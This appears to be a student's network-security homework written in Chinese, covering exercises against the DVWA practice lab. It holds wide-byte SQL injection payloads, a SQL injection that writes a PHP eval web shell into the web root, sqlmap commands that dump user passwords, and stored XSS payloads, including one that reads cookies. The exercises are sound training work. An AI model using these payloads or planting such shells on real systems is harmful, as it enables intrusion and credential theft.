10
网络安全C10-2024.10.1
作业:
- 利用宽字节注入实现“库名-表名”的注入过程,写清楚注入步骤;
a:爆库名1+%82%27++union+select+1,database%28%29%23&
- 查表名1 %82' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
- 利用SQL注入实现DVWA站点的Getshell,写清楚攻击步骤
1.利用sql注入插入木马
' union select 1,"<?php eval($_POST['a']);?>" into outfile 'C:/phpstudy_pro/WWW/dvwa/hackable/shell2.php
2.利用蚁剑连接木马
- 使用Sqlmap工具完成对DVWA数据库的注入过程,要求按照库、表、列、内容的顺序进行注入;
库
python2 sqlmap.py -r 1.txt --batch --current-db
表
python2 sqlmap.py -r 1.txt --batch --tables -D dvwa
列
python2 sqlmap.py -r 1.txt --batch -T users -D dvwa -columns
内容
python2 sqlmap.py -r 1.txt --batch -D dvwa -T users -C user,password --dump
4、完成DVWA靶场存储型XSS的漏洞练习。
低级
中级
取消字符长度限制
<sCRIPt>alert(1)</SCRipt>
高级
用事件
<img src=## onerror=alert(document.cookie)>

浙公网安备 33010602011771号